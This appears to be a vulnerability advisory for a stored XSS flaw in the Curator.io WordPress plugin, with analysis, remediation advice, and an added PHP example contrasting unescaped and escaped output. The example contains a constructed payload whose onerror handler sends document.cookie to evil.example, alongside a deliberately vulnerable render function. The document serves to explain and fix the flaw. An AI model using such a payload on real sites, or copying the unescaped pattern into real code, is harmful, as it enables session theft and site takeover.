CVE-2025-62742

2025-12-31

Lifecycle Timeline

CVE Published: Dec 31, 2025 - 13:15 (NVD)
Analysis Generated: Apr 01, 2026 - 17:44 (vuln.today)

Description (NVD)

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Curator.io Curator.io curatorio allows Stored XSS. This issue affects Curator.io: from n/a through <= 1.9.5.

Analysis (AI-generated)

Stored cross-site scripting (XSS) in the Curator.io WordPress plugin through version 1.9.5 allows an authenticated user with access to the plugin's content to inject script that the site persists and later renders to other users. Because the payload is stored server-side, it executes in the browser of every user who views the affected page, including administrators, without any further action by the attacker. The root cause is improper escaping of stored input during web page generation (CWE-79). A payload running in an administrator's browser can read that user's session, submit authenticated requests on their behalf and thereby escalate to full control of the site. EPSS currently rates the probability of exploitation in the wild at 0.04%, but the persistence of stored XSS and the value of WordPress admin sessions make prompt patching the right call regardless.

Technical Context (AI-generated)

Curator.io is a WordPress plugin (slug curatorio; listed on this page as CPE wp:plugin:curatorio) that manages and displays curated content. The vulnerability is CWE-79 (Improper Neutralization of Input During Web Page Generation): user-supplied input is written into HTML output without being escaped for the context in which it lands. When the plugin renders a page that contains the stored value, characters such as <, >, " and ' are emitted literally rather than as HTML entities, so input that contains markup becomes live markup and any script it carries runs in the origin of the WordPress site. The page does not identify the specific injection point; depending on whether it is rendered in the admin panel or on the public frontend, the script executes with the privileges of whichever user views the content, and an administrator viewing it is the highest-value target.
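The following is an added example, not code from Curator.io or from this advisory, showing the CWE-79 pattern described above in a minimal WordPress-style plugin fragment: a stored title echoed unescaped (vulnerable) next to the same rendering with context-appropriate escaping (hardened). The option name, field name and the curatorio_* function names are hypothetical, and the attacker input is constructed. The fallback definitions of esc_html, esc_attr and sanitize_text_field exist only so the file runs under plain php outside WordPress; inside WordPress the real functions are used.

```php
<?php
// Added example (not Curator.io code). Demonstrates stored XSS from unescaped
// output and the WordPress fix: sanitize on save, escape per output context.

// Fallbacks so this runs under plain `php` without WordPress loaded.
// Inside WordPress these functions already exist and are not redefined.
if (!function_exists('esc_html')) {
    function esc_html($s) {
        return htmlspecialchars((string) $s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr($s) {
        return htmlspecialchars((string) $s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('sanitize_text_field')) {
    // Simplified stand-in for WordPress' sanitize_text_field(): drop tags and control chars.
    function sanitize_text_field($s) {
        return trim(preg_replace('/[\x00-\x1f\x7f]/', '', strip_tags((string) $s)));
    }
}

// Constructed attacker input, as it would arrive from a settings/content form.
// It closes the attribute it is placed in, then plants an event-handler payload.
$payload = '"><img src=x onerror="fetch(\'//evil.example/?c=\'+document.cookie)">';

// Vulnerable pattern (CWE-79): the value is stored as-is and echoed as-is,
// both inside an attribute and inside a text node.
function curatorio_render_vulnerable($stored_title) {
    return '<div class="curator-feed" data-title="' . $stored_title . '">'
         . '<h2>' . $stored_title . '</h2></div>';
}

// Hardened save path: sanitize at the trust boundary. A real handler would also
// verify the nonce (check_admin_referer) and the capability (current_user_can).
function curatorio_save_hardened($raw_title) {
    return sanitize_text_field($raw_title);
}

// Hardened render path: escape for the exact context the value lands in.
// esc_attr() for attribute values, esc_html() for text content.
function curatorio_render_hardened($stored_title) {
    return '<div class="curator-feed" data-title="' . esc_attr($stored_title) . '">'
         . '<h2>' . esc_html($stored_title) . '</h2></div>';
}

$vuln = curatorio_render_vulnerable($payload);
$safe = curatorio_render_hardened(curatorio_save_hardened($payload));

echo "Vulnerable output:\n", $vuln, "\n\n";
echo "Hardened output:\n", $safe, "\n\n";

// The vulnerable output contains a live <img onerror=...> element that fires on
// load; the hardened output contains only entity-encoded text and no new tags.
echo (strpos($vuln, '<img') !== false) ? "vulnerable: injected tag is live\n" : '';
echo (strpos($safe, '<img') === false)  ? "hardened: no tag survived\n" : '';
```

Output escaping is the fix for CWE-79; sanitizing on save is defense in depth, not a substitute, because a value can reach the page through paths other than the one form that sanitized it. Escaping must match the output context: esc_attr() for attribute values, esc_html() for text nodes, esc_url() for href/src, and wp_kses_post() when limited HTML is intentionally allowed.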

Affected Products (AI-generated)

The Curator.io WordPress plugin (slug curatorio), all versions up to and including 1.9.5. The fixed version, patch status and vendor advisory are recorded in the Patchstack vulnerability database entry linked under Remediation.

Remediation (AI-generated)

Update the Curator.io plugin to the release that Patchstack lists as fixed, via the WordPress plugin dashboard or directly from the WordPress.org plugin repository; confirm the fixed version number against the Patchstack entry rather than assuming the next release after 1.9.5 contains the fix. If no patched version is available, deactivate the plugin or restrict the roles that can submit content the plugin renders to trusted users only. Review audit logs and the plugin's stored content for script tags, on* event-handler attributes or javascript: URLs that would indicate prior exploitation; because the payload is stored, it remains live until the stored data is cleaned, so removing injected content is part of remediation, not only updating the code. For patch availability and details, consult the Patchstack vulnerability report at https://patchstack.com/database/Wordpress/Plugin/curatorio/vulnerability/wordpress-curator-io-plugin-1-9-5-cross-site-scripting-xss-vulnerability.
